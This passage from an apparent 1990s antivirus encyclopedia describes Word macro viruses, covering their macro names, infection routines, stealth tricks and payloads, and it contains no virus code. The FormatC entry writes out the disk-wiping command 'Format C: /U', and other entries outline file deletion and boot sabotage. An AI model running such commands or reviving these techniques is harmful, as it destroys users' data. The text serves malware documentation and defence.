  15847. infect the global template (NORMAL.DOT). Hassle
  15848. uses macro stealth techniques to hide itself. It uses the
  15849. macro "ToolsMacro" to make recognition of an infected
  15850. document more difficult. If the user selects any command,
  15851. it will display the following windows and close Microsoft
  15852. Word:
  15853.  
  15854. " Out of Memory or System Resources"
  15855.  
  15856. Hassle is one of the very few non-destructive macro viruses.
  15857. It only infects other files and displays the following
  15858. text window:
  15859.  
  15860. "Are you sure to Quit?"
  15861.  
  15862. This only occurs seldomly, with a 5% probability.
  15863.  
  15864. Another payload asks the user to register a software with
  15865. Microsoft. Hassle will only accept one answer, which
  15866. is as follows:
  15867.  
  15868. "Bill Gates", "Microsoft" and "666"
  15869.  
  15870. Whenever the user selects the Tools/Macro command,
  15871. Hassle will display the following text at the bottom of
  15872. the screen:
  15873.  
  15874. " Microsoft Word Assistant Version 6.2"
  15875.  
  15876.  
  15877. [Word_HiSexy]
  15878. Virus Name: Word.HiSexy
  15879. Alias Name: Guess, Teaside, Phantom
  15880. Virus Type: Word macro virus
  15881. Virus Length: 1126 Bytes (1 Macro)
  15882. Symptoms: Texts are printed or inserted into documents,
  15883.           Opened documents are closed immediately
  15884. Place of origin: Germany
  15885. Description: This virus infects MS Word documents.
  15886.  
  15887. Hisexy has only one macro with a size of 1126 Bytes.
  15888.  
  15889. "AutoOpen"
  15890.  
  15891. Hisexy has a very unusual characteristic compared to
  15892. other macro viruses.  It only uses one Execute-Only
  15893. macro, "AutoOpen," and does not use common macros
  15894. such as FileSaveAs to infect other files. All infection
  15895. routines to infect NORMAL.DOT and regular documents are inside
  15896. the "AutoOpen" macro.
  15897.  
  15898. When an infected document is opened, Hisexy checks
  15899. if the document variables are set to "populated." If not,
  15900. a new global template (NORMAL.DOT) is created and the virus macro
  15901. "AutoOpen" is copied into the new document. After that, the variables
  15902. are set to "populated" to mark the file as infected. If the variable
  15903. is already set, the virus infects the new document by transferring the
  15904. "AutoOpen" macro using the MakroCopy command. Guess is the first macro
  15905. virus to use the document variables as a checking mechanism for already
  15906. infected documents.
  15907.  
  15908. Because of an error inside the program code, the virus does not
  15909. replicate properly.
  15910.  
  15911. Upon a random number (between 0 and 100), Hisexy activates various
  15912. destructive payloads. It changes the active font size or creates a
  15913. new document (NORMAL.DOT) with the following text:
  15914.  
  15915. "The word is out."
  15916. "The word is spreading..."
  15917. "The Phantom speaks..."
  15918. "Sedbergh"
  15919. "is CRAP"
  15920. "The word spreads..."
  15921.  
  15922. The text will then be printed out. The following texts will be
  15923. inserted into the active document upon the calculated random number:
  15924.  
  15925. "This school is really good.  NOT"
  15926. "We all love Mr. Hirst."
  15927. "M.R.Beard"
  15928. "This network is REALLY fast."
  15929. "Hi Sexy!"
  15930. "Who's been typing on my computer?"
  15931. "Well helloooo there!"
  15932. "Guess who?"
  15933.  
  15934. Also every once in a while, the active document is closed by Guess.
  15935. Because Guess only uses the "AutoOpen" macro it also works with
  15936. other versions of Microsoft Word such as the German version.
  15937. (c) Stefan Kurtzhals
  15938.  
  15939.  
  15940. [Word_Goldfish]
  15941. Virus Name: Word.Goldfish
  15942. Alias Name: Fishfood
  15943. Virus Type: Word macro virus
  15944. Virus Length: 1906 Bytes (2 Macros)
  15945. Symptoms: Display of windows
  15946. Place of origin: USA
  15947. Description: This virus infects MS Word documents.
  15948.  
  15949. Goldfish contains 2 encrypted (Execute-Only) macros
  15950. with a size of 1906 Bytes.
  15951.  
  15952. "AutoOpen"
  15953. "AutoClose"
  15954.  
  15955. When an infected document is opened, Goldfish will
  15956. infect the global template (NORMAL.DOT). Further documents
  15957. are infected when they are opened ("AutoOpen"). Infected
  15958. documents are converted internally into templates, which
  15959. is very common for macro viruses.
  15960.  
  15961. Goldfish is one of the very few non-destructive macro viruses.
  15962. It only infects other files and displays the following text window:
  15963.  
  15964. "I am the goldfish, I am hungry, feed me."
  15965.  
  15966. The message will not go away until the user types in an acceptable
  15967. response. The available answers are:
  15968.  
  15969. "fishfood", "worms", "worm", "pryme" and  "core".
  15970.  
  15971. [Word_Friendly]
  15972. Virus Name: Word.Friendly
  15973. Alias Name: Friends, Friendly:De
  15974. Virus Type: Word macro virus
  15975. Virus Length: 9867 (20 Macros)
  15976. Symptoms: Display of texts
  15977. Place of origin: Germany
  15978. Description: This virus infects MS Word documents.
  15979.  
  15980. Friendly seems to be from the same author as the macro
  15981. virus <LBYNJ>, since it includes a reference to
  15982. "Nightmare Joker." The same author has written various
  15983. macro viruses, and is also author of the first macro virus
  15984. generation kit. Friendly is a complex macro virus with 20 macros:
  15985.  
  15986. "Abbrechen"
  15987. "AutoExec"
  15988. "AutoOpen"
  15989. "Cancel"
  15990. "DateiBeenden"
  15991. "DateiNeu"
  15992. "DateiOeffnen"
  15993. "DateiSchliessen"
  15994. "DateiSpeichern"
  15995. "DateiSpeichernUnter"
  15996. "ExtrasMacro"
  15997. "ExtrasMakro"
  15998. "Fast"
  15999. "FileExit"
  16000. "FileNew"
  16001. "FileOpen"
  16002. "FileSave"
  16003. "FileSaveAs"
  16004. "Infizieren"
  16005. "Talk"
  16006.  
  16007. Friendly is an effort to write a virus for more than one
  16008. language. All macro names were translated, and internal
  16009. English macro commands are used.  By looking at the
  16010. currency settings (DM - German Marks), Friendly checks
  16011. if it was started from a German Microsoft Word. It looks
  16012. like the author did not have an actual copy of the English Word
  16013. version since some of the macro names were translated incorrectly
  16014. (ExtrasMacro instead of ToolsMacro). Friendly therefore does not
  16015. work with versions other than the German Word version.
  16016.  
  16017. When an infected document is opened, Friendly tries to infect the
  16018. global template (NORMAL.DOT). It checks the global template for a
  16019. previous infection by looking for the text "Friendly",
  16020. Author = Nightmare". After the macros have been transferred the
  16021. destructive payload is called from the "Fast" macro.
  16022.  
  16023. Friendly infects other documents whenever new
  16024. ones are created, an action is canceled, and whenever
  16025. documents are opened, closed, saved, or exited from
  16026. Word. As very common with macro viruses, an infected
  16027. document is internally converted into a template.
  16028. Friendly does not check for a previous document
  16029. infection. It simply overwrites existing macros.
  16030.  
  16031. The destructive payload, inside the "Fast" macro, is
  16032. called when the system clock has a second value smaller
  16033. than 2. Friendly then creates a debug script inside the
  16034. C:\DOS directory and makes it executable by using the
  16035. DOS DEBUG.EXE command. In addition, Friendly adds an entry
  16036. in AUTOEXEC.BAT, so the DOS based virus is started after the
  16037. next boot-up. The DOS based virus inside Friendly has a size
  16038. of 395 Bytes and is a memory resident companion virus encrypted
  16039. with CryptCOM.
  16040.  
  16041. Friendly displays the following text on January 1st:
  16042.  
  16043. " Ein gutes neues Jahr !"
  16044.  
  16045. and infects EXE files upon execution. COM files are created with
  16046. the same name as EXE files and with the attributes:
  16047.  
  16048. "READ-ONLY" and "HIDDEN"
  16049.  
  16050. If the virus is active, the following text is displayed
  16051. when the user tries to display the macro list:
  16052.  
  16053. "You can't do that!"
  16054. "I'm very anxious!"
  16055. "Hello my friend!"
  16056. "<< Friends >> Virus"
  16057.  
  16058. (translated:)
  16059.  
  16060. "Du kannst das nicht tun!"
  16061. "Ich bin sehr aengstlich!"
  16062. "Hallo mein Freund!"
  16063. "<< Friends >> Virus"
  16064.  
  16065. After May 1st, Friendly displays the following text
  16066. when infecting documents for the first time (except for NORMAL.DOT):
  16067.  
  16068. (translated:)
  16069.  
  16070. "Hello my Friend!"
  16071. "I'm the << Friends >> Virus and how are you?"
  16072. "Can you give me your name, please?"
  16073. "Hello .... I have a good and a bad message for you! The
  16074. bad message is that" "you have now a Virus on your
  16075. Harddisk and the good message is that I'm "harmless
  16076. and useful. Press OK!"
  16077. "If you don't kill me, I will insert a programme in your
  16078. AutoExec.bat thats "your Keyboard accelerated.
  16079. Please .... don't kill me. Goodbye!"
  16080.  
  16081. The entered name will then be displayed.
  16082.  
  16083. All the texts will be shown only once.
  16084.  
  16085. Friendly will also display various Wordbasic error
  16086. messages, such as:
  16087.  
  16088. "Unbekannte(r) Befehl, Subroutine oder Funktion"
  16089.  
  16090. or
  16091.  
  16092. "Syntaxfehler"
  16093. (c) Stefan Kurtzhals
  16094.  
  16095.  
  16096. [Word_FMT.Trojan]
  16097. Virus Name: Word.FMT.Trojan
  16098. Alias Name: FormatC, Trojan.FC
  16099. Virus Type: Word macro virus
  16100. Virus Length: 81 Bytes (1 Macro)
  16101. Symptoms: C:\ is formatted
  16102. Place of origin: Posted to Usenet
  16103. Description: This virus infects MS Word documents.
  16104.  
  16105. FormatC consists of only one virus macro:
  16106.  
  16107. "AutoOpen"
  16108.  
  16109. FormatC is not a virus but a trojan horse, which does
  16110. not replicate.  This macro trojan contains only one
  16111. encrypted macro, which is "AutoOpen".
  16112.  
  16113. When an infected document is opened, the trojan
  16114. triggers the destructive payload, which types " Format
  16115. C: /U " in a minimized DOS box and then formats your
  16116. C drive.  FormatC is very unlikely to spread since it
  16117. does not infect other files.
  16118.  
  16119. FormatC was also posted into Usenet, resulting to data losses
  16120. to some users.
  16121.  
  16122. (c) Stefan Kurtzhals
  16123.  
  16124.  
  16125. [Word_Doggie]
  16126. Virus Name: Word.Doggie
  16127. Alias Name: None
  16128. Virus Type: Word macro virus
  16129. Virus Length: 610 Bytes (3 Macros)
  16130. Symptoms: Display of windows
  16131. Place of origin: USA
  16132. Description: This virus infects MS Word documents.
  16133.  
  16134. Doggie contains 3 macros with a size of 610 Bytes.
  16135.  
  16136. "Doggie"
  16137. "AutoOpen"
  16138. "FileSaveAs"
  16139.  
  16140. Upon opening an infected document, Doggie will infect
  16141. the global template (NORMAL.DOT). Further
  16142. documents are infected with the "FileSaveAs" command.
  16143. Infected documents are converted internally to templates,
  16144. which is very common for macro viruses.
  16145.  
  16146. Doggie is one of the very few non-destructive macro viruses.
  16147. It only infects other files and displays the following
  16148. text window:
  16149.  
  16150. "Doggie "
  16151.  
  16152. Since Doggie uses English macro names ("FileSaveAs")
  16153. it will only work with the English version of Microsoft Word.
  16154.  
  16155.  
  16156.  
  16157.  
  16158.  
  16159.  
  16160.  
  16161.  
  16162. [WORD_WW2DEMO]
  16163.  
  16164. Virus Name: Word.WW2Demo
  16165. Alias Name: WM.DMV
  16166. Virus Type: Word macro virus
  16167. Virus Length: 3002 Bytes (1 Macro)
  16168. Symptoms: Display of messages
  16169. Place of origin: United States, also posted in Usenet
  16170. Description: This virus infects MS Word documents.
  16171.  
  16172. Demonstration contains 1 macro with a size of 3002 Bytes.
  16173.  
  16174. "AutoClose"
  16175.  
  16176. Demonstration was the first macro virus written by
  16177. Joel McNamara, who published a detailed paper about
  16178. macro viruses. It is believed that DMV invited additional
  16179. virus authors to write Word macro viruses. While the paper
  16180. was not published until Concept was discovered, it helped
  16181. virus authors to use new techniques.
  16182.  
  16183. Joel McNamara also published an Excel macro virus,
  16184. which is non functional.
  16185.  
  16186. When an infected document is closed, DMV infects the
  16187. global template (NORMAL.DOT). Further documents
  16188. are infected when they are closed. They are also converted
  16189. internally to templates, which is very common for macro
  16190. viruses.
  16191.  
  16192. Upon infection, Demonstration displays the following
  16193. text strings on the screen:
  16194.  
  16195. " Counting global macros"
  16196. "AutoClose macro virus is already installed in
  16197. NORMAL.DOT."
  16198. "Infected NORMAL.DOT with a copy of AutoClose
  16199. macro virus. "
  16200. "AutoClose macro virus already present in this document."
  16201. "Saved current document as template."
  16202. "Infected current document with copy of AutoClose
  16203. macro virus."
  16204. " Macro virus has been spread. Now execute some other code
  16205. (good, bad, or indifferent)."
  16206.  
  16207.  
  16208. [WORD_Divina]
  16209. Virus Name: Word.Divina
  16210. Alias Name: Roberta
  16211. Virus Type: Word macro virus
  16212. Virus Length: 2357 Bytes (1 Macro)
  16213. Symptoms: Beeps and pauses during display of messages,
  16214.           Display of text windows
  16215. Place of origin: Italy
  16216. Description: This virus infects MS Word documents.
  16217.  
  16218. Divina was probably written by the author of the Date
  16219. macro virus, and is widespread in Malta, Spain and Italy.
  16220. Divina contains only one encrypted (Execute-Only)
  16221. macro with a size of 2357 Bytes.
  16222.  
  16223. "AutoClose"
  16224.  
  16225. Divina infects the global template (NORMAL.DOT) when
  16226. an infected document is opened and then closed. Further
  16227. documents are infected when they are closed via the
  16228. "AutoClose" command.
  16229.  
  16230. Divina has two payloads. The first payload checks the
  16231. system time, and in case of a value of 17 in the minutes
  16232. field, it will display a set of windows. Between each
  16233. displayed box it will pause and beep.
  16234. The following boxes are displayed:
  16235.  
  16236. "ROBERTA TI AMO!"
  16237.  
  16238. "Virus 'ROBERTA' is running. Hard Disk damaged.
  16239. Start antivirus?"
  16240.  
  16241. "Exit from system and low level format are recommended."
  16242.  
  16243. "Exit from System?"
  16244.  
  16245. After the last message Divina tries to exit Windows.
  16246.  
  16247. The second payload is activated on May 21. Divina will
  16248. again check the system clock, and if a document is being
  16249. closed between the 10th and 20th or between the 40th and
  16250. 50th minute, it will display another 2 windows.
  16251.  
  16252. "DIVINA IS THE BEST!"
  16253.  
  16254. followed by another window with an Italian message.
  16255. Divina does not contain any destructive payloads. The
  16256. only problem with Divina is that it might panic users
  16257. into low-level formatting their hard drives.
  16258.  
  16259.  
  16260. [Word_Date]
  16261. Virus Name: Word.Date
  16262. Alias Name: AntiDMV, Infezione
  16263. Virus Type: Word macro virus
  16264. Virus Length: 1042 Bytes (1 Macro)
  16265. Symptoms: Removal of AutoClose macro from documents
  16266. Place of origin: United States
  16267. Description: This virus infects MS Word documents.
  16268.  
  16269. Date was probably written by the author of the Divina
  16270. macro virus.  It contains only one encrypted
  16271. (Execute-Only) macro, with a size of 1042 Bytes.
  16272.  
  16273. "AutoOpen"
  16274.  
  16275. When an infected document is opened, Date infects the
  16276. global template (NORMAL.DOT). Further documents are
  16277. infected when they are opened.  Infection occurs only
  16278. until June 1, 1996. By the time you read this document,
  16279. Date should not be a threat anymore even though infected
  16280. documents might still be around.
  16281.  
  16282. Date is also known under the name AntiDMV. This
  16283. name was chosen because it removes the "AutoClose"
  16284. macro from documents. The macro virus "DMV",
  16285. which has only one "AutoClose" macro, can therefore
  16286. be removed with the Date virus.
  16287.  
  16288.  
  16289. [WORD_CONCEPT-G]
  16290. Virus Name: Word_Concept.G
  16291. Alias Name: Parasite, Parasite 0.8, P-Site
  16292. Virus Type: Word macro virus
  16293. Virus Length: 3670 Bytes (7 Macros) in .doc files
  16294.             3450 Bytes (7 Macros) in global templates
  16295. Symptoms: Display of Windows
  16296.           Modified documents
  16297. Place of origin: United States
  16298. Description: This virus infects MS Word documents.
  16299.  
  16300. Concept.G contains 7 encrypted (Execute-Only) macros
  16301. with a size of 3670 Bytes.
  16302.  
  16303. "K"
  16304. "A678"
  16305. "Para"
  16306. "Site"
  16307. "I8U9Y13"
  16308. "Paylaod"
  16309. "AutoOpen"
  16310.  
  16311. Concept.G is activated when an infected document is
  16312. opened (AutoOpen).  Upon activation, Concept.G
  16313. infects the global template (NORMAL.DOT).
  16314. Infected documents are converted internally to templates,
  16315. which is very common for macro viruses.
  16316.  
  16317. Concept.G has various payloads. The first replaces the
  16318. following words in infected documents:
  16319.  
  16320. "and" with "not"
  16321.  
  16322. The second payload is a little bit more comprehensive.
  16323. Concept.G checks the system time for a specific value
  16324. in the days section. In case of a 16 (every 16th of the
  16325. month) it activates its payloads. It then replaces the
  16326. following letters/word in infected documents:
  16327.  
  16328. "." (dot) with "," (comma)
  16329. "and" with "not"
  16330. "a" with an "e"
  16331.  
  16332. According to the Concept.G virus code, it is a beta release.
  16333. Instead of version 1.0 (Concept.F) it is version 0.8.
  16334.  
  16335. [WORD_CONCEPT]
  16336. Virus Name: Word_Concept
  16337. Alias Name: Prank, WW6Macro, WBMV, WW6Infector,
  16338.           Winword
  16339. Virus Type: Word macro virus
  16340. Virus Length: 1968 Bytes (4 Macros)
  16341. Symptoms: Display of a text window with "1" in it
  16342. Place of origin: United States
  16343. Description: This virus infects MS Word documents.
  16344.  
  16345. Concept was the first macro virus found "In-the-Wild".
  16346. It was discovered in July-August 1995 and is now the
  16347. most common virus. Macro viruses, such as Concept,
  16348. are not dependent on operating systems. They work
  16349. with Windows, Windows 95, Windows NT and Macintosh.
  16350.  
  16351. Word macro viruses only work as long as Microsoft
  16352. Word is active. However they can still do permanent
  16353. damage (for example delete important system files).
  16354.  
  16355. Concept.A contains 4 unencrypted macros with a size
  16356. of 1968 Bytes.
  16357.  
  16358. "AAAZAO"
  16359. "AAAZFS"
  16360. "AutoOpen"
  16361. "Payload"
  16362.  
  16363. Concept.A is activated when an infected document is
  16364. opened (AutoOpen).  Upon activation, Concept.A
  16365. checks for a previous infection of the global template
  16366. (NORMAL.DOT). It does this by looking for the
  16367. "Payload" and "FileSaveAs" macro.
  16368.  
  16369. If none of the macros are present, Concept.A copies
  16370. its virus macros to the global template by using the
  16371. "MacroCopy" command. The macro "AAAZFS" is saved
  16372. under the name "FileSaveAs".
  16373.  
  16374. An infected NORMAL.DOT file contains the
  16375. following macros:
  16376.  
  16377. "AAAZAO"
  16378. "AAAZFS"
  16379. "FileSaveAs"
  16380. "Payload"
  16381.  
  16382. After infection of the global template, Concept.A makes
  16383. an entry in the WIN.INI file. It sets "WW6I=1" and
  16384. shows a text window with the number "1" in it.
  16385.  
  16386. Concept.A does not contain any destructive payload,
  16387. even though is has a macro with the name "Payload".
  16388. The "Payload" macro is empty except for the
  16389. following entry:
  16390.  
  16391. "That's enough to prove my point"
  16392.  
  16393. The following text can be found in the virus code,
  16394. yet is never displayed:
  16395.  
  16396. "Payload is just for fun"
  16397.  
  16398. Since Concept.A uses English macro names, it does
  16399. not work with foreign versions of Microsoft Word,
  16400. such as the German version.
  16401.  
  16402. Concept.A was accidentally distributed on various
  16403. CD's (including a CD from Microsoft). This is one
  16404. of the reasons why Concept.A is currently the most
  16405. common virus.
  16406.  
  16407. (c) Stefan Kurtzhals
  16408.  
  16409.  
  16410. [Winword_Colors]
  16411. Virus Name: Winword.Colors
  16412. Alias Name: Rainbow, Colo-a
  16413. Virus Type: Word macro virus
  16414. Virus Length: 6470 Bytes (9 Macros)
  16415. Symptoms: Change of colors of Windows objects
  16416. Place of origin: Portugal
  16417. Description: This virus infects MS Word documents.
  16418.  
  16419. Colors is a complex macro virus including 9
  16420. Execute-Only macros:
  16421.  
  16422. "AutoClose"
  16423. "AutoExec"
  16424. "AutoOpen"
  16425. "FileExit"
  16426. "FileNew"
  16427. "FileSave"
  16428. "FileSaveAs"
  16429. "macros"
  16430. "ToolsMacros"
  16431.  
  16432. Colors is the first macro virus that can still infect, even
  16433. when all the Auto-Macros are turned off. It also tries to
  16434. hide itself so the user can not use the "Tools/Macro"
  16435. command to look at the macro list and discover the virus.
  16436. The virus will even execute when people try to do so. Instead,
  16437. people should use File/Templates/Organizer/Macros
  16438. command to detect and delete the offending macros. Colors
  16439. even has a Debug-mode, in which macros are not saved as
  16440. Execute-Only (encrypted).
  16441.  
  16442. Upon the activation of one of the macros (all except for
  16443. AutoExec), Colors will try to infect the global template
  16444. (Normal.dot), whereby it turns off the prompting of
  16445. Microsoft Word before saving. Colors checks if all its
  16446. macros are already present in the global template
  16447. and if this is not the case, it transfers its macros or
  16448. replaces already existing ones.
  16449.  
  16450. Normal.dot becomes infected when a document is opened,
  16451. saved, closed or Microsoft Word is exited. Colors.A
  16452. infects documents when a file is created or saved (FileNew,
  16453. FileSave, FileSaveAs). Again Colors.A checks the Macro
  16454. list if the document is already infected.
  16455.  
  16456. The destructive payload, plus some other functions, are
  16457. located in the "macros" macro. The payload (a sub-routine
  16458. "objective") is activated upon the call of each macro,
  16459. except AutoExec. AutoExec, which is empty, was probably
  16460. defined to overwrite existing anti-virus macros.
  16461.  
  16462. Colors.A creates a variable in the [Windows] section of
  16463. WIN.INI with the name "countersu," which counts upwards
  16464. from zero. After each 300 call, the virus then changes the
  16465. color palette of 21 Windows desktop elements. Background,
  16466. buttons and borders will all have new randomly selected
  16467. colors which will leave the user with a sometimes unusual
  16468. looking desktop.
  16469.  
  16470. This will not work on Microsoft Word for Macintosh.
  16471.  
  16472. (c) Stefan Kurtzhals
  16473.  
  16474.  
  16475. [WINWORD_COLORS.D]
  16476. Virus Name: Winword.Colors.D
  16477. Alias Name: Colo-d, WM.Colors
  16478. Virus Type: Word macro virus
  16479. Virus Length: 19688 Bytes (9 Macros)
  16480. Symptoms: Display of error messages
  16481. Place of origin: Unknown
  16482. Description: This virus infects MS Word documents.
  16483.  
  16484. Colors.D is a macro virus including 9 encrypted
  16485. (Execute-Only) macros:
  16486.  
  16487. "AutoClose"
  16488. "AutoExec"
  16489. "AutoOpen"
  16490. "FileExit"
  16491. "FileNew"
  16492. "FileSave"
  16493. "FileSaveAs"
  16494. "macros"
  16495. "ToolsMacros"
  16496.  
  16497. Colors.D seems to be a combination of the previously found
  16498. Colors.A virus and the Microsoft macro virus solution
  16499. "Scanprot." It is not recommended to use the Tools/Macro
  16500. command to look for the macros from Colors.B. The virus
  16501. will execute when trying to do so. Instead, use the
  16502. File/Templates/Organizer/Macros command to detect
  16503. and delete the offending macros.
  16504.  
  16505. Even though Colors.D has an anti-virus solution part
  16506. in its code, it is still able to spread and infect the global
  16507. template (NORMAL.DOT) and new documents.
  16508.  
  16509. Colors.D displays the following error message:
  16510.  
  16511. "Unknown Command, Subroutine, or Function"
  16512.  
  16513.  
  16514. [WORD_CLOCK]
  16515. Virus Name: Word_Clock
  16516. Alias Name: Clock:De, WM.Extra
  16517. Virus Type: Word macro virus
  16518. Virus Length: 3795 Bytes (11 Macros)
  16519. Symptoms: Display of windows
  16520. Place of origin: USA
  16521. Description: This virus infects MS Word documents.
  16522.  
  16523. Clock contains eleven encrypted (Execute-Only) macros
  16524. with a size of 3795 Bytes.
  16525.  
  16526. "Action"
  16527. "Oeffnen"
  16528. "AutoExec"
  16529. "AutoOpen"
  16530. "Speichern"
  16531. "Extrasmakro"
  16532. "DateiSchliessen"
  16533. "Datumunduhrzeit"
  16534. "Dateidokvorlagen"
  16535. "Dateiallesspeichern"
  16536.  
  16537. Clock uses macro stealth techniques to hide itself. It uses
  16538. "ExtrasMakro" ("ToolsMacro") and "DateiDokVorlagen"
  16539. ("File Templates") to make recognition of an infected
  16540. document more difficult.
  16541.  
  16542. When an infected document is opened, Clock
  16543. infects the global template (NORMAL.DOT). To hide
  16544. the infection it turns off the prompting of Word before
  16545. saving a modified global template. Infected
  16546. documents are converted internally into templates,
  16547. which is very common for macro viruses.
  16548.  
  16549. When an infected document is opened after the
  16550. 26th of each month, Clock will display a window
  16551. containing the time. It will also activate one of
  16552. its destructive payloads, which is to set the system
  16553. clock to a value of 33 in the seconds field. Clock
  16554. does this every 2 to 3 minutes, which results
  16555. in a less accurate system clock.
  16556.  
  16557. The second payload will start in 1997. Clock will
  16558. check the system clock, and in case of a minute
  16559. value smaller than 5, it will flip the "FileOpen"
  16560. and "FileSave" macros.
  16561.  
  16562. This will only happen on the following days
  16563. during the month:
  16564.  
  16565. 1st
  16566. 2nd
  16567. 13th
  16568. 21st
  16569. 27th.
  16570.  
  16571. Since Clock uses German macro names, it will only
  16572. work with the German version of Microsoft Word.
  16573.  
  16574.  
  16575. [WORD_BueroNeu]
  16576. Virus Name: Word.BueroNeu
  16577. Alias Name: Buero:De, BuroNeu, Bureau
  16578. Virus Type: Word macro virus
  16579. Virus Length: 697 Bytes (2 Macros)
  16580. Symptoms: Files deleted
  16581.           Files renamed
  16582. Place of origin: Germany
  16583. Description: This virus infects MS Word documents.
  16584.  
  16585. Buero contains two encrypted (Execute-Only) macros
  16586. with a size of 697 Bytes.
  16587.  
  16588. "AutoOpen"
  16589. "BueroNeu"
  16590.  
  16591. When an infected document is opened, Buero infects the
  16592. global template (NORMAL.DOT). The global template
  16593. includes the "DateiSpeichern" macro instead of
  16594. "AutOpen." Further documents are infected with the
  16595. "DateiSpeichern" ("FileSave") command. Infected documents
  16596. are converted internally into templates, which is very
  16597. common for macro viruses.
  16598.  
  16599. Upon infection Buero activates its destructive payloads.
  16600. After August 15, 1996, Buero renames the system file
  16601. "IO.SYS" to "IIO.SYS." This action will leave the computer
  16602. unbootable. The second destructive payload searches for
  16603. C:\*.DOC files and deletes them.
  16604.  
  16605. Since Buero uses German macro names ("DateiSpeichern"),
  16606. it will only work with the German version of Microsoft Word.
  16607.  
  16608.  
  16609. [WORD_BOOM]
  16610. Virus Name: Word.Boom
  16611. Alias Name: Boombastic, Boom:De
  16612. Virus Type: Word macro virus
  16613. Virus Length: 2863 Bytes (4 Macros)
  16614. Symptoms: Payload activates at 13:13:13 every 13th day
  16615.          after February 1996.
  16616.          Menu structure of Word is renamed and a new
  16617.          Normal.dot text template will be created and
  16618.          printed.
  16619. Place of origin: Germany
  16620. Description: This virus infects MS Word documents.
  16621.  
  16622. Boom is a macro virus with 4 encrypted (Execute-Only)
  16623. macros.
  16624.  
  16625. "AutoOpen"
  16626. "AutoExec"
  16627. "DateiSpeichernUnter"
  16628. "System"
  16629.  
  16630. Besides Xenixos, Boom is the second macro virus
  16631. written for the German version of Microsoft Word. Boom
  16632. varies from other known macro viruses and it is not
  16633. known to be a variant of another macro virus. Boom
  16634. works only with the German version of Microsoft
  16635. Word. Other versions will only permit Boom to infect
  16636. the global template (Normal.dot), not documents. This
  16637. limits the spread of Boom to German users of Word.
  16638.  
  16639. Inside the macro "AutoOpen" is the infection routine for
  16640. the global template (Normal.dot). Whenever an infected
  16641. document is opened, Normal.dot will get infected.
  16642. Boom does not use the common "KopiereMakro"
  16643. command, instead it uses "Organisiere.Kopiere."
  16644. Before transferring the macros, the FastSave option will
  16645. be enabled. In addition, Boom bypasses the prompting of
  16646. Word whenever a modified Normal.dot is saved.
  16647.  
  16648. The macro "AutoExec," (called on each start of
  16649. Microsoft Word), has a time checking mechanism
  16650. which will call the "System" macro whenever a time of
  16651. 13:13:13 (every month on the 13th) is reached. The
  16652. "System" macro contains the destructive payload.
  16653. "AutoExec" will also be called from the virus macros
  16654. "AutoOpen" and "DateiSpeichernUnter" when a document
  16655. is opened and saved.
  16656.  
  16657. The destructive payload renames the menu structure
  16658. of Word:
  16659.  
  16660. Datei       ->    Mr.Boombastic
  16661. Bearbeiten  ->    and
  16662. Ansicht     ->    Sir WIXALOT
  16663. Einfuegen   ->    are
  16664. Format      ->    watching
  16665. Extras      ->    you
  16666. Tabelle     ->    !
  16667. Fenster     ->    !
  16668. Hilfe       ->    !
  16669.  
  16670. Between each renaming command the virus will include
  16671. pauses plus a sound out of the PC speaker. After the
  16672. menu names have been changed, Boom will create a new
  16673. global template (Normal.dot) and insert the following text:
  16674.  
  16675. "Greetings from Mr. Boombastic and Sir WIXALOT !!! "
  16676. "Oskar L., wir kriegen dich!!!"
  16677. "Dies ist eine Initiative des Institutes zur Vermeidung und
  16678. Verbreitung von " "Peinlichkeiten, durch in der
  16679. Oeffentlichkeit stehende Personen, unter der"
  16680. "Schirmherrschaft von Rudi S. !"
  16681.  
  16682. This text will be printed by Boom.
  16683.  
  16684. Boom also contains additional texts, such as:
  16685.  
  16686. "Mr. Boombastic and Sir WIXALOT !!!"
  16687.  
  16688. Additional destructive payloads have been modified by
  16689. "REM's" into comments and are therefore deactivated.
  16690.  
  16691. (c) Stefan Kurtzhals
  16692.  
  16693.  
  16694. [Word_Bandung]
  16695. Virus Name: Word.Bandung
  16696. Alias Name: None
  16697. Virus Type: Word macro virus
  16698. Virus Length: 4262 Bytes (6 Macros)
  16699. Symptoms: Display of windows
  16700.           Creation of new files
  16701. Place of origin: Bandung, Indonesia
  16702. Description: This virus infects MS Word documents.
  16703.  
  16704. Bandung contains 6 macros with a size of 4262 Bytes.
  16705.  
  16706. "AutoExec"
  16707. "AutoOpen"
  16708. "FileSave"
  16709. "FileSaveAs"
  16710. "Toolsmacro"
  16711. "Toolscustomize"
  16712.  
  16713. When an infected document is opened, Bandung infects the
  16714. global template (NORMAL.DOT). Further documents are
  16715. infected with the "FileSave" and "FileSaveAs" commands.
  16716. Infected documents are converted internally into templates,
  16717. which is very common for macro viruses.
  16718.  
  16719. Bandung also uses macro stealth techniques to hide itself.
  16720. It uses "ToolsMacro" to make recognition of an infected
  16721. document more difficult.
  16722.  
  16723. Upon infection Bandung activates its destructive payloads.
  16724.  
  16725. It creates the file C:\PESAN.TXT with following message:
  16726.  
  16727. "Anda rupanya sedang sial, semua file di mesin ini kecuali
  16728. yang berada  "
  16729. "di direktori WINDOWS dan WINWORD telah hilang,
  16730. jangan kaget, ini bukan " "ulah Anda, tapi ini hasil
  16731. pekerjaan saya...Barang siapa yang berhasil  "
  16732. "    menemukan cara menangkal virus ini, saya aka" +
  16733. "n memberi listing"
  16734. "virus ini untuk Anda !!! Dan tentu saja saya akan terus
  16735. datang kesini"
  16736. " untuk memberi Anda salam dengan virus-virus terbaru
  16737. dari saya...selamat ! "
  16738. " Bandung, Selasa,"
  16739.  
  16740. Following the message is the current Day, Month,
  16741. Year, Date and Time.
  16742.  
  16743. Example:           29 Agustus 1996, Jam: 18:09
  16744.  
  16745. Bandung also displays the following error messages:
  16746.  
  16747. "                           Fail on step 29296                     "
  16748. and
  16749.  
  16750. "No such macro or command"
  16751.  
  16752.  
  16753. [Word_Atom]
  16754. Virus Name: Word.Atom
  16755. Alias Name: Atomic, WM.Atom
  16756. Virus Type: Word macro virus
  16757. Virus Length: 1029 Bytes (4 Macros)
  16758. Symptoms: Deletes files inside directories.
  16759.           Documents are password protected.
  16760. Place of origin: Ukraine
  16761. Description: This virus infects MS Word documents.
  16762.  
  16763. Atom.A has 4 encrypted (Execute-Only) macros with a
  16764. size of 1029 Bytes.
  16765.  
  16766. "Atom"
  16767. "AutoOpen"
  16768. "FileOpen"
  16769. "FileSaveAs"
  16770.  
  16771. Once an infected file is opened, the global template
  16772. (Normal.dot) becomes infected if the macro "Atom"
  16773. is not already included in the macro list.  Macros are
  16774. transferred with the MacroCopy command, and then
  16775. the destructive payload is called upon.
  16776.  
